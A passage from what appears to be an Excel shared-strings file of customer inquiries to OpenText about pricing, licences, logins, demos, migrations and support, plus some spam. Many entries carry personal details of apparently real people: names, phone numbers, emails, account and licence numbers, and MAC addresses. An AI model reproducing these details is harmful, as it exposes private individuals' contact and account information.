       * Please note: The Software ID is mixed case, and case-sensitive! Please copy and paste the Software ID._x000D_
_x000D_
       Email: _x000D_
       Related license information:_x000D_
       Account: Inflow Technology LLC_x000D_
       Usage: (not specified)_x000D_
       Seat(s): 1_x000D_
---_x000D_
_x000D_
How do we go about generating a key? _x000D_
_x000D_
Thanks._x000D_
_x000D_
Robert Harris</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Greetings from HCL._x000D_
_x000D_
Let me introduce myself as Daminder Singh. I am from HCL’s Global Procurement Services Team and we have an urgent requirement for a proposal for your product(s) mentioned below:_x000D_
_x000D_
Software	- d2e Platform from Xenos, Ver. - 5.4.2, 	MIPS - 1154, MSU - 139. _x000D_
Would you be in a position to share a proposal today / tomorrow._x000D_
Country of usage – UK._x000D_
_x000D_
Should you have any questions, feel free to reachout to myself and I will revert just as quickly as possible._x000D_
_x000D_
Thank You._x000D_
Daminder Singh._x000D_
Sr. Manager_x000D_
Global Procurement Services_x000D_
HCL_x000D_
_x000D_
www.hcl.com</t>
  </si>
  <si>
    <t>I am looking to procure an eRoom license to be used in a demo/development environment. I cannot seem to find much information. I would like to know the cost and how long it would take to purchase.</t>
  </si>
  <si>
    <t>Need Product Management Contact details for this product to evaluate internal use case in OpenText Global Commercial Datacenters</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich interessiere mich für die OpenText Content Suite und OpenText Documentum. Könntens Sie mir hierzu weiteres Info Material zusenden. _x000D_
_x000D_
Freundliche Grüße_x000D_
Marcus Steck</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
We would like to phone you next Wednesday afternoon, 14 June, to discuss your Document Management System if this is convenient for you? Is it possible that one of your Consultants is available at 14:00 swiss time to discuss? We are currently exploring different options for a DMS solution and would be grateful for an introduction on your product. _x000D_
We recently saw it last year at the Success Factors conference in Vienna._x000D_
Thank you and Kind Regards_x000D_
Kristina Wirz</t>
  </si>
  <si>
    <t>I have been trying to contact our Rep to get a renewal quote for our GXS Services Agreement/Catalouge  and GXS VAN Service Fees expiring 6/16/17.  Please have our Rep send over quote so I can process this years renewal?</t>
  </si>
  <si>
    <t>Hello, we have bought you Gupta Report Builder version 4.0.0 via SAMSistemas in Argentina. They sent my license number and now I need download this product. Could you help me?_x000D_
_x000D_
My license is: 92321248_x000D_
_x000D_
Regards_x000D_
_x000D_
Matías Cassani</t>
  </si>
  <si>
    <t>Lack of access to request development/demo licenses. As a Service and Technology Partner we need to be able to request such licenses for the products we support. Please can you therefore authorise my account to request such licenses.</t>
  </si>
  <si>
    <t xml:space="preserve">One of my Customer is interest to Buy Brava Reader pls give me price for 1 User And Multi user   </t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of an international organization combating violent extremism in Saudi Arabia, I am contacting Actuate/Open Text to gauge your interest in supporting an open source monitoring and collection capability.  We will soon release an Open Source Monitoring and Analysis Request for Proposal (“RFP”) to select companies; Actuate/Open Text has been identified by the organization’s leadership as a potentially viable partner for supporting our needs._x000D_
_x000D_
If Actuate/Open Text is interested in this opportunity, we ask that you provide a Point of Contact to include a corporate mailing address, office/mobile number, and email address with whom we can establish contact and agree upon an initial Non-Disclosure Agreement before issuing the RFP._x000D_
_x000D_
Thank you for your time and consideration.  We look forward to your prompt reply._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Collin Barry_x000D_
+966 50 755 6830_x000D_
</t>
  </si>
  <si>
    <t>Reseller quote</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a bizdev / sales contact to discuss about using box.com as content management platform connected to salesforce for a 300 to 500 users projects for one of our end customers in Paris. </t>
  </si>
  <si>
    <t>I need to gain a copy of the agreement (if we have one) for EasyLink Fax Services which Balfour Beatty utilise. I also require a stakeholder or contact in Balfour Beatty who you have originally dealt with. _x000D_
_x000D_
Thank you_x000D_
Alex</t>
  </si>
  <si>
    <t>I would like to have product information on text analytics.</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to you to express our interest in expanding our technology offering to include ecm.  We are a provider of contact center solutions to various verticals in South Africa.  We specialize in hosted contact centers and are partners with Vodacom who offer our product set to their customers.  I am the CTO for Inovo and our CEO, Wynand Smit looks after the commercial and financial aspects for new product take on.  I would appreciate it if you can put me in touch with someone in your organization with whom we could have an exploratory discussion about the ecm market in general and a possible relationship into the future. </t>
  </si>
  <si>
    <t xml:space="preserve">Would you please provide the quotation and features of the product in a presentable format?_x000D_
We are planning to implement the EDMS._x000D_
We have to submit that presentation to CEO to convince him._x000D_
</t>
  </si>
  <si>
    <t>We need to add Alo, LLC company prefix:191677 to our COLOR IMAGE APPAREL, INC. account. Alo, LLC is the child to parent company COLOR IMAGE APPAREL, INC.</t>
  </si>
  <si>
    <t>Unable to log-in with password; password is unable to reset.</t>
  </si>
  <si>
    <t>Discuss services to recognize handwritten applications and create data file.</t>
  </si>
  <si>
    <t>Subject: Setup a Master password for IMAP (all mailboxes) in Firstclass email system._x000D_
_x000D_
I am looking to migrate an existing firstclass Organisation to Office365 and I am going to do an "imap migration". I would like to know if it is possible to set a global admin password that could login into all of the mailboxes._x000D_
_x000D_
The current version of the Firstclass System is: Version: 12.1 (Build 2169)_x000D_
_x000D_
Kind regards,</t>
  </si>
  <si>
    <t>Hello, We are currently using Version 10.5.0 (10.5.0.1408) with our SAP 4.6c system.  I am wondering if there is a way to load attachments directly to the opentext server vs scanning the documents in with a barcode.  Currently, if we attach directly to SAP, it attaches on the SAP server but we would like it to go directly to the opentext server._x000D_
_x000D_
Thanks_x000D_
Margaret</t>
  </si>
  <si>
    <t xml:space="preserve">We are exploring embedding reporting and analytics into our solution </t>
  </si>
  <si>
    <t>where does this email go to?  pls email me and let me know</t>
  </si>
  <si>
    <t>Hi._x000D_
What is the current version of bi query admin/user?_x000D_
I have the 10.3.0.24_x000D_
_x000D_
Greetings._x000D_
_x000D_
--Arturo Sovino</t>
  </si>
  <si>
    <t>ich möchte mich über die Möglichkeiten einer KV in der Türkei erkundige. Ich habe vor im Oktober dieses Jahres in die Türkei auszuwandern. Ich bin Rentnerin und hier bei der AOK freiwilliges Mitglied._x000D_
Mit freundlichen Grüßen_x000D_
Helga Weber</t>
  </si>
  <si>
    <t>I would like to know how the licensing schemes work (Single Seat vs Network)</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
We are looking for a Software for our AS2 communications with various companies (aprox. Between 10 and 16 Partners)._x000D_
Our requirements are:_x000D_
-              We need a Software Product that can be installed in our servers, and manages the AS2 connections end to end._x000D_
-              The possibility to add and remove partners and licenses on demand without affecting any other partners (no restarts required)._x000D_
-              Access to a support service of rapid response (we appreciate a detailed SLA)._x000D_
_x000D_
Please send us price and requirements according to our needs. We appreciate to you clarify the commercial licensing mode (license + yearly maintenance cost  / yearly fixed service costs with no license cost / etc.)._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>Hi, my name is Eduardo Aurioles, Im a Pre-Sales Engineer for Enapsys, an OpenText Partner of choice. The reason for my contact is because I would like to know if you can share to me a demo environment for OpenText xECM 16.0 . This will be really useful for our customers demo, to show them the new version of this incredible tool and the new interface with FIORI._x000D_
_x000D_
Hope you can help me or give me any solution._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Jose Eduardo Aurioles</t>
  </si>
  <si>
    <t>Need to download latest version of Exceed and Secureshell but not finding it when I logon to the website support.opentext.com</t>
  </si>
  <si>
    <t>We are in need of a DAM solution at Repair Clinic as we undergo a digital transformation. I was hoping to get someone on the phone either today or tomorrow to talk through features &amp; pricing.</t>
  </si>
  <si>
    <t>Problems logging in. I have the correct network id, user id and password. when attempting to log in it keep saying wrong info. click the reset password and no email is sent to change the password</t>
  </si>
  <si>
    <t>Would like to consider OpenText DMS</t>
  </si>
  <si>
    <t>Canerector Inc located in former Hummingbird Ltd space at 1 Sparks Ave. Receiving mail from Payless Holdings LLC for Hummingbird Ltd, and it has been so for months now. Please contact them to let them know your address, this might be important. Thank you.</t>
  </si>
  <si>
    <t>Solicito contato o mais breve possível para obter informações comerciais dos produtos IXOS e Documentum.</t>
  </si>
  <si>
    <t>We are wanting to migrate our LiveLink data into Office 365, keeping the permissions intact. What is the best/easiest way to do this? Thanks</t>
  </si>
  <si>
    <t>On of our clients is in need of a fax solution to send from a Healthcare Integration engine to a fax recipient.  The number of faxes will initially be quite low 300/year but can likely increase.  We can connect with web services or email to send faxes which would likely be the preferred option._x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">The main reason is to have our corporate files available on a content management system instead of having them on local drives </t>
  </si>
  <si>
    <t>Bonjour Madame, Monsieur, _x000D_
consultant en informatique décisionnel sur GENIO, j 'ai des questions concernant GENIO V16._x000D_
    1. Je voudrais savoir si dans le corps d'un mail, peut-on mettre une partie en italique ? _x000D_
  2. Peut-on zipper un fichier txt (préalablement  généré par un module genio) ?_x000D_
  3. Inversement, peut-on dé-zipper un fichier en entrée d'un process genio?_x000D_
  4. Lorsque je me connecte sur le Scheduler, l'affichage par défaut des projets est la date de création. Je change à chaque fois pour mettre par ordre alphabétique. _x000D_
Comment faire pour enregistrer cet affichage par défaut ?_x000D_
  5. Dans quel langage GENIO a été développé ?_x000D_
_x000D_
Dans l'attente d'une réponse à mes questions, veuillez recevoir madame, monsieur, l'expression de mes salutations distinguées.</t>
  </si>
  <si>
    <t>Training that will allow me to do add / maintain customers through bizlink.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are a Design &amp; Project Management (Architecture &amp; Fitouts) service provider &amp; would like to offer our services for your upcoming projects in India._x000D_
_x000D_
Best Regards,_x000D_
Ashish Puri</t>
  </si>
  <si>
    <t>Need to know the training cost of Right Fax product. Also please let us know what is the duration of training and if any prerequisites are there.</t>
  </si>
  <si>
    <t>Our company hopes to be able to agent your company's products。</t>
  </si>
  <si>
    <t>Need to understand the cost structure and migration details from Livelink 9.7.1 to latest ECM version.</t>
  </si>
  <si>
    <t>Bs</t>
  </si>
  <si>
    <t>I forgot my 5 digit passcode</t>
  </si>
  <si>
    <t>I wanna work with the open text company to explore my creativity and knowledge etc. So, please give me a chance.</t>
  </si>
  <si>
    <t>I would like to know if OpenText will be staffing up for contract work with OpenText Exstream.   Will OpenText have on staff Exstream developers available for work from an SOW?   If so, how many developers are on staff and available? If not, does OpenText have any future plans to staff up for Exstream contract work?_x000D_
I would like to discuss this further.  Please contact me through email and we can setup a call._x000D_
Thank you._x000D_
_x000D_
Dan Whitmore</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking for a dedicated server. We are a clean, compliant emailing company with_x000D_
no issues._x000D_
Please let us know what we can do._x000D_
Thank you,_x000D_
Dama Media 1 Operations</t>
  </si>
  <si>
    <t>Please send me information about pricing and api. As the developer of Mobifax android fax app, i am looking for a reliable fax service provider with international fax capabilities</t>
  </si>
  <si>
    <t>Can not access to My Support._x000D_
After I received Registration Confirmation, I selected the confirmation link, but I still not able to access to My Support.</t>
  </si>
  <si>
    <t>Hello there, _x000D_
I am hoping to touch base with someone regarding CBL options for contractors coming to our site. _x000D_
We would like to set up an orientation they can complete prior to arriving. We are curious about options and costs._x000D_
Any information would be greatly appreciated. _x000D_
Thank you, _x000D_
Hailey</t>
  </si>
  <si>
    <t>Interested in exploring RightFax option for my clinic, and hoping to gain a quote and more information about the services for healthcare facilities.</t>
  </si>
  <si>
    <t>Hi.  I have a few questions about the OpenText Process Platform training:_x000D_
_x000D_
Has the Process Platform Fundamentals 10.x course been replaced by the Entity Modeling and Process Modeling courses?_x000D_
Is there a plan to offer a Process Platform Fundamentals 10.x course in the next 2 months?_x000D_
What version of Process Platform are they currently training on in the EM and PM courses?_x000D_
What version of Process Platform is the Cordys Fundamentals course training on?_x000D_
_x000D_
Thanks,_x000D_
Clay</t>
  </si>
  <si>
    <t>I can not access my GXS catalog. I have reset the password a few times and still can not log in._x000D_
_x000D_
Please assist._x000D_
_x000D_
Thanks,_x000D_
Taleen</t>
  </si>
  <si>
    <t xml:space="preserve">can you please quote_x000D_
_x000D_
QTY  56_x000D_
OpenText Brava Reader_x000D_
http://www.opentext.com/what-we-do/products/enterprise-content-management/content-centric-applications/opentext-brava/opentext-brava-reader _x000D_
_x000D_
End User: _x000D_
City of Des Moines_x000D_
400 ROBERT D RAY DR_x000D_
Des Moines IA 50309_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to build Dashboard </t>
  </si>
  <si>
    <t>Hello - I would like to schedule a demo regarding the following review and approval process:_x000D_
 _x000D_
Automate change request, review and approval processes: Document Management's graphical Workflow Designer tool enables you to automate document management processes, such as document change requests and document review and approval processes, to ensure that they are carried out accurately and consistently. You can design processes according to your own requirements or according to those imposed by regulatory agencies.</t>
  </si>
  <si>
    <t>Hi, Do you have offices in Mexico? I need information about EDI platform communication. I would appreciate your response</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to discuss the possibility of transfering our current in house Access database programs to salesforce platform. _x000D_
</t>
  </si>
  <si>
    <t>Hello - We provide enterprise CMS and DMS solutions for local government. We would like to add OCR, Redaction and Auto Indexing capability to our applications. We are interested in possibly integrating with OpenText Capture as our OCR engine or other recommended products. I'd like to get product information and pricing models.Thank you</t>
  </si>
  <si>
    <t>I am looking for Export Control Classification Numbers (ECCNs) for specific products of yours. If there is someone I can talk to in Trade Compliance or Export Control, that would be perfect. Thank you.</t>
  </si>
  <si>
    <t>Requesting assistance installing Enterprise Scan software in Windows 10. Current version is 9.5. Is there an updated version available?</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wie eben mit Hr. Diel telefonisch besprochen, möchte ich hiermit einen Zugang zum my-Support-Bereich bei OpenText beantragen._x000D_
_x000D_
Vielen Dank für Ihre Mühe._x000D_
Mit freundlichen Grüßen, _x000D_
Thomas Krämer_x000D_
Projektleiter Internet_x000D_
--------------------------------------------_x000D_
Verlag Dr. Otto Schmidt KG_x000D_
Gustav-Heinemann-Ufer 58_x000D_
50968 Köln_x000D_
Tel.: 0221-93738-716_x000D_
Fax: 0221-93738-924_x000D_
kraemer@otto-schmidt.de_x000D_
www.otto-schmidt.de_x000D_
AG Köln, HRA 5237_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>For OpenText to share your solution and request for proposal for a document management system</t>
  </si>
  <si>
    <t>One of my customers has a Accell application running on a Dataserver database. This software was purchased from Unify some years ago._x000D_
The customer wants to install the software on a new Linux machine and asked me to enquire about the possibilities and costs (12 runtime users with option for application development)._x000D_
Besides that we need to know if database backups can be restored from new machine to old machine and vise versa._x000D_
Background info: I used to work for Unify in the past._x000D_
kind regards, Henk Elskamp</t>
  </si>
  <si>
    <t xml:space="preserve">Frage zur Gupta Report Builder Freeware:_x000D_
Hallo zusammen, wo kann eine aktuelle Version des Gupta Report Builders heruntergeladen werden? Gibt es eine Freeware oder muss dies lizensiert werden?_x000D_
Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
i.A. David Kehrle _x000D_
_x000D_
IT-Service / Client Management_x000D_
Liebherr-Components Biberach GmbH _x000D_
Telefon: +49 (7351) 414277 _x000D_
Telefax: +49 (7351) 412597 _x000D_
</t>
  </si>
  <si>
    <t>Saint-Gobain South Africa uses Open Text Viewer, and we have has difficulties using this on a 64 it Windows 7 Operating System._x000D_
Please send me a link to download the 64 bit version of Open Text Viewer 10.5</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am a technician for Intility and we are Erichsen &amp; Horgen's IT provider. They use First Class and have an issue when starting the application. They have fc files to save config but the program does not remember the config for next run, and they also get an errormessage each time: An error occurred while sending the command to the application. This only applies to their Windows 10 computers. Do you have any solution to this? Best regards, Robin</t>
  </si>
  <si>
    <t>My company doesn't have support contract but we work for different Insurance and Banking clients. This is a request to access Exstream forum and knowledge base artifacts</t>
  </si>
  <si>
    <t xml:space="preserve">with visual 9.0 comes gupta report builder 7.0_x000D_
which needs a product media code_x000D_
can you please give me one _x000D_
many thanks in advance_x000D_
</t>
  </si>
  <si>
    <t>I would like to get a quote for the Teleform system - the software for creating the forms, scanners, and scanning software.</t>
  </si>
  <si>
    <t>looking for a third party add on to integrate with SharePoint</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, my name is Curtis Mathews and I am a Sourcing Specialist at the US telecom company Sprint in Overland Park, KS.  I am reaching out to get more information on your CCM products and capabilities.  Please contact me at my email curtis.mathews@sprint.com when you get this message so we can further this conversation._x000D_
_x000D_
Thank you,_x000D_
Curtis Mathews </t>
  </si>
  <si>
    <t>looking to replace current solution</t>
  </si>
  <si>
    <t>Interested in OpenText Cloud FAX services for one of our customers</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to download the Free DWG Viewer from Brava!, but when I tried to use a *.dwg file I received the message on the work screen:_x000D_
Invalid license._x000D_
Unable to load files._x000D_
_x000D_
An update is required for Brava! FreeDWG Viewer._x000D_
Please visit www.infograph.com for an update._x000D_
_x000D_
The Update button leads to "Not Found_x000D_
_x000D_
The requested URL "/bravaProductExpiration.asp?productname=BravaACX&amp;version=7.1.1.11&amp;localization=EN&amp;PIN=777&amp;distributor=0" was not found on this server."_x000D_
_x000D_
How can we get this program to run, or is there another "free" *.dwg reader offered by your company?  Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in regulated document management solution for the life sciences industry. </t>
  </si>
  <si>
    <t>Process for transferring a license from one server to another</t>
  </si>
  <si>
    <t>I have tried calling 3 times now.  I've left voice mails and get no response.  I am contacting you concerning a charge from Open Text with a trans date of 04/25 and an amount of $143.40.  The item # is IGS-182537.  My boss cannot remember what this may be for and is questioning the charge.  Please research and get back to me quickly. Thanks.</t>
  </si>
  <si>
    <t>RFP opportunity</t>
  </si>
  <si>
    <t>Treinamento Stream Server (instalação (stream server) e programação (Story Teller))</t>
  </si>
  <si>
    <t>Need information/overview/demo of employee records management solutions.  Thank you!</t>
  </si>
  <si>
    <t>Cobb Technologies is a reseller looking for a fax server solution that integrates well with Konica Minolta, Canon and Kyocera devices.  Currently, our fax server solution is faxcore.  Can we schedule a webinar/training to learn more about the Rightfax solution?  Thanks</t>
  </si>
  <si>
    <t>quote for cloud fax</t>
  </si>
  <si>
    <t>Hi I'm getting a 'Licence already registered' message when trying to open files using a Brava Desktop 2.3.0.24 installation.  The installation was moved to a new computer some time ago but this is first time the software has been used.  I believe this is to do with the change in MAC address on the PC? New Mac address is  40-8D-5C-C3-CA-87  old one was B8-AC-6F-21-D0-7E.  Is this something you can help with please?</t>
  </si>
  <si>
    <t>Documentum/opentext solution exploration/client work</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Could you tell me who is the account manager for the CFL (Luxembourg) ? Is it still Mr Verwey ? Thank you for your answer._x000D_
Regards,_x000D_
_x000D_
--------------------------------------------_x000D_
From: Marie-Francoise TRINTELER _x000D_
Sent: mardi 23 mai 2017 12:33_x000D_
To: 'John Verwey'_x000D_
Cc: Christian KETTMANN_x000D_
Subject: RE: CFL - New Account Executive - OpenText_x000D_
_x000D_
Hello Mr Verwey,_x000D_
Are you still the Account Executive of our society, the CFL ?_x000D_
_x000D_
If yes, it would be nice and interesting to meet ourselves, also with Mr Kettmann, the CFL Group IT Manager._x000D_
_x000D_
We would like to present the CFL, to talk about the DMS projects at the CFL, and we are interested to know more about the Opentext roadmap._x000D_
_x000D_
Could you propose some dates in June for such a meeting in Luxembourg ?_x000D_
Thank you_x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
M-Françoise DUPUIS-TRINTELER_x000D_
_x000D_
Service Informatique - Division Applications de Gestion_x000D_
Bureau 216 (Direction Générale) _x000D_
Tel : (+352) 49.90.56.00 _x000D_
_x000D_
CFL - Chemins de Fer Luxembourgeois_x000D_
9 , Place de la Gare_x000D_
L - 1616 Luxembourg_x000D_
Web : http://www.cfl.lu_x000D_
_________________________________________________________ _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Right Fax</t>
  </si>
  <si>
    <t>GOSTARIA DE PARTTICIPAR DE EVENTOS E PALESTRAS SOMOS SOLUÇÕES FINANCEIRAS E TECNOLOGIA</t>
  </si>
  <si>
    <t>Different PDF compatibility with Captiva</t>
  </si>
  <si>
    <t>We have implemented SAP-VIM by OpenText and experience post go live challenges. I therefore want to have access to all the resources possible that can help to stablise the use of the solution. But at the moment, I do not have access to the OpenText Knowledge Base. _x000D_
Can you please help me to arrange that!_x000D_
Best regads, Eelco Roeten</t>
  </si>
  <si>
    <t xml:space="preserve">i need a quote to run a second brooktrout card for my rightfax server. I have left voice messages and this is my second note in a week.   I have not heard from anybody </t>
  </si>
  <si>
    <t>I would like to confirm that I have registered for the class 2-4912 Entity Modeling for Process Platform (2 days: June 6-7) only once.</t>
  </si>
  <si>
    <t>We've transferred one of our high-speed scanners and copy of QuikScan from our Houston location to our San Francisco location. Our IT department says we need to locate a PC with Internet Explorer vs. 7 because all of them had been upgraded to I.E. vs 10. I removed the software from the Houston PC to transfer the software to SFO.._x000D_
Our current version of QuickScan is 4.5 dated 2006. Is this software compatible with Windows  version 10 or 11?_x000D_
_x000D_
Thank you for your assistance with this question?_x000D_
_x000D_
David White</t>
  </si>
  <si>
    <t>Dear Open Text,_x000D_
We are looking for a new CMS / DAM tool for Medela internally, and Open text was one of the tool that our management ask us to look at. Would you have some time for me for a briefing / background due we already have existing CMS tool currently but would like to have a better one? Will there be a possibility for me to have a demo as well from Open Text? Thank you._x000D_
Best regards,_x000D_
Deenah_x000D_
+41798499707 / maria.chiesi@medela.ch</t>
  </si>
  <si>
    <t>We are wanting to upgrade our desktop faxing system because the email facility will only send emails in monochrome, can you tell me if your software will allow emails to be sent in colour please?</t>
  </si>
  <si>
    <t>Hi, I just tried registering for your 'SiraView Seminar with Synapps event' occurring in London on 7th June - however when following the link in the original e-mail I seem to have inadvertently signed up to the Leeds event instead.  Please can you remove me from the attendance at Leeds.  Are there any spaces left for the London event?  If so, I would like to be signed up to that one.  Regards.  Simon.</t>
  </si>
  <si>
    <t>Hi, I've got a client that's looking for a Document Management System / Content Management System. I'm wondering if your Content and Discovery Suites might be suitable and would like to know cost, timeframe and hosting options. Can you please contact me?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our company  is considering the purchase of the OpenText SOCKS Client for 500 or 700 users._x000D_
Please calculate the cost for 500 and for 700 users._x000D_
_x000D_
Kind regards,_x000D_
      Andrey.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on an ECM assignment in Copenhagen and need a trial version of Brava to show the customer a demo to view and annotate pdfs in Webtop._x000D_
_x000D_
I see you have a desktop trial on this website but I need a version that I can embed in Webtop. _x000D_
_x000D_
Additionally in past I have come across cases where users reported performance issues with Brava viewer. I learnt that you now have Html 5 Viewer in latesr version that is very efficient. Please can I have a trial of that one._x000D_
_x000D_
To give more details on my demo, I need to integrate Brava viewer with Webtop (with Content server 7). User will view, annotate and save pdf directly within Brava viewer. </t>
  </si>
  <si>
    <t>We are interested in OpenText WCM offer. At present we are using Livelink WCM and we would like to change to a new tool._x000D_
We have been talking to OpenText in Spain about OpenText WEM and OpenText TeamSite._x000D_
We are looking for a second opinion on OpenText TeamSite and available partners to implement it._x000D_
Having more than a half of our business in Central Europe, particularly in Germany, we would appreciate being contacted by someone from OpenText Deutschland to comment this possible project.</t>
  </si>
  <si>
    <t>Urgent looking for pricing for ANNUAL OPENTEXT ECM SUITE SOFTWARE LICENSE RENEWAL FOR A PERIOD OF 3-YEARS for NATIONAL HEALTH LABORATORY SERVICE / NHLS</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We are currently looking for a new ECM System for our business. Could you please get in touch with me to discuss our scope and how/if your product will be able to meet the needs of our company. </t>
  </si>
  <si>
    <t>Request for the knowledge center access</t>
  </si>
  <si>
    <t>I’m interested in purchasing a Digital Asset Management system for photographs. I work in a hospital in Australia and by legislation anything that might related to patients (such as some of the photos of them) must be stored in Australia. Could you please tell me whether your DAM is hosted in Australia? Thanks</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
in our company, we are using skype for business along with Open Text socks client. It seems that these 2 software are not fully compatible. I am unable to establish skype meetings with skype contacts unless I delete some content with CLI command "netsh winsock reset"_x000D_
_x000D_
After this, skype works, but connections through Open Text socks client are not socksified anymore, and only way how to resolve this is to reinstall socks client, which brings us back to skype for business issue. can I address this in more details to someone from Open Text vendor?_x000D_
_x000D_
thank you_x000D_
Pavel</t>
  </si>
  <si>
    <t>Hi there,_x000D_
We just acquired a new GS1 prefix and I need to add our new prefix to the catalog. Can you show me how to do that, or do it for me? Our account number is 010140786000. New GS1 prefix is: 8430351._x000D_
_x000D_
I need to load new UPCs into the Inovis catalog but am getting an error message because the system can't identify the new prefix._x000D_
_x000D_
Thanks,_x000D_
Lang</t>
  </si>
  <si>
    <t>CCE download access as well as MY Support access</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated Database of following prospects mention below:_x000D_
_x000D_
We have the complete contact details and verified email addresses of CEO, CIO, CTO, CFO, CSO, CRO, CISO, Co-Founder, Chief Architect, Managing Director, Director of MIS, Director of Communications, Systems Software Managers, Facilities Manger, Director of GRC, Data Center Manager, Security Manager , Compliance Manager, Risk Manager, VP of Information Technology, Head of Business Systems, VP Applications, EVP Sales, EVP of Marketing, Head of Networking, VP of Communications, VP Finance, VP Strategy , General Managers, VP Operations, Cloud Computing, VP Administration, Head of Client Support, Head of Production , VP of Product Management, Head of Security , Head of Disaster Recovery, VP Data Center, Head of Services, VP Software Development, Distinguished Engineer, Ecosystem Solutions Architect, Software Architect, Software Engineer, Software Specialist, Solutions Marketing, Senior Program Manager , Software, IP &amp; Delivery Systems, Senior Director, Senior Engineer, Customer Business Transformation, Infrastructure Architect, Analyst, Architect, Advisor and many more._x000D_
_x000D_
Audience: Banking &amp; Finance, Telecom, Technology (Software, ISV, Advisory, IT, Service Provider, Distributors, ERP), Manufacturing, Media &amp; Entertainment, Utilities, Engineering and Construction, Building Automation, Insurance, Healthcare, Mobile Communication and Consumer Electronics, Business Services, Pharma._x000D_
_x000D_
We are specialized in B2B Contacts. We can provide you customized data based on your target industry, kindly mention the below details to understand your needs better, so that we can provide you more information regarding the same._x000D_
_x000D_
Target Industry:_x000D_
Target Job  Titles:_x000D_
Target Geography:_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Regards,_x000D_
Jessica Collins_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Good Morning, _x000D_
_x000D_
I am helping organize the Kanata Festival of Beer again this year, part of the Canada Day in Kanata celebrations June 30th and July 1st. With this year being Canada 150, we are ramping up the festival and are excited to help present Finger Eleven as the headline act. We've also created an amazing sponsorship/corporate table opportunity for the event which I was hoping you would take a closer look at._x000D_
_x000D_
Here are the specifics:_x000D_
•	Your corporate banner on display (Printed by the festival 4'x6') - visible by thousands_x000D_
•	A corporate table for 8 in the VIP for both Friday and Saturday (best view of the main stage and fireworks)_x000D_
•	Light Snacks in the VIP_x000D_
•	Onsite VIP Parking_x000D_
•	Private VIP washroom trailer for you and your guests_x000D_
$800+hst_x000D_
_x000D_
We think this is fantastic value for the opportunity to relax and enjoy the festivities with guests, employees or family this Canada Day weekend. I've attached a poster with more info. Please let me know if we can count you in for this year._x000D_
For more information, please visit www.kanatafestivalofbeer.com_x000D_
Thanks again for your consideration, _x000D_
_x000D_
David Howard_x000D_
VP_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Good Morning, _x000D_
_x000D_
I am helping organize the Kanata Festival of Beer again this year, part of the Canada Day in Kanata celebrations June 30th and July 1st. With this year being Canada 150, we are ramping up the festival and are excited to help present Finger Eleven as the headline act. We've also created an amazing sponsorship/corporate table opportunity for the event which I was hoping you would take a closer look at._x000D_
_x000D_
Here are the specifics:_x000D_
•	Your corporate banner on display (Printed by the festival 4'x6') - visible by thousands_x000D_
•	A corporate table for 8 in the VIP for both Friday and Saturday (best view of the main stage and fireworks)_x000D_
•	Light Snacks in the VIP_x000D_
•	Onsite VIP Parking_x000D_
•	Private VIP washroom trailer for you and your guests_x000D_
$800+hst_x000D_
_x000D_
We think this is fantastic value for the opportunity to relax and enjoy the festivitie</t>
  </si>
  <si>
    <t>Need access and invoice to pay support for renewal notice on contract 0012270788.</t>
  </si>
  <si>
    <t>Support configuring Exceed version 15.0.1.191 on windows 7 professional SP1, 64-bit machine to connect with Linux server</t>
  </si>
  <si>
    <t>Account does not have permissions to My Support, unable to view or manage existing licenses for Brava Products.</t>
  </si>
  <si>
    <t>Chariot Routes in Mariners Blvd</t>
  </si>
  <si>
    <t>Interested in MediaManagement</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently using ApplicationXtender Web Access .NET Version  6.52.045.0 and .NET Framework Version  2.0.50727.8762 to access our archived transcripts.  I am starting to have issues querying my transcripts in Chrome and IE - IE in compatibility mode seems the only to gain full functionality.  In addition, after our last upgrade (several years ago), I can no longer add batches of index documents (e.g. an entire graduating class of transcripts).  I'm not sure if I need additional training, support, and/or updated products.  Any assistance would be appreciated. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We are interested in an EDRMS Institute wide.  Would like to know overview of your product, licensing, and cost, as well if you have post-secondary organizations as clients._x000D_
Best Regards,_x000D_
Faduma Khalaf_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a solution to manage multiple document types in project form.  Does your solution integrate with any ERP systems? </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are a software developer and are interested in learning about the new tools Team Developer 7 because we currently  use Team Developer 5.2 </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are currently looking for a solution to process and redact historical data stores containing documents with PCI-DSS credit card info. _x000D_
_x000D_
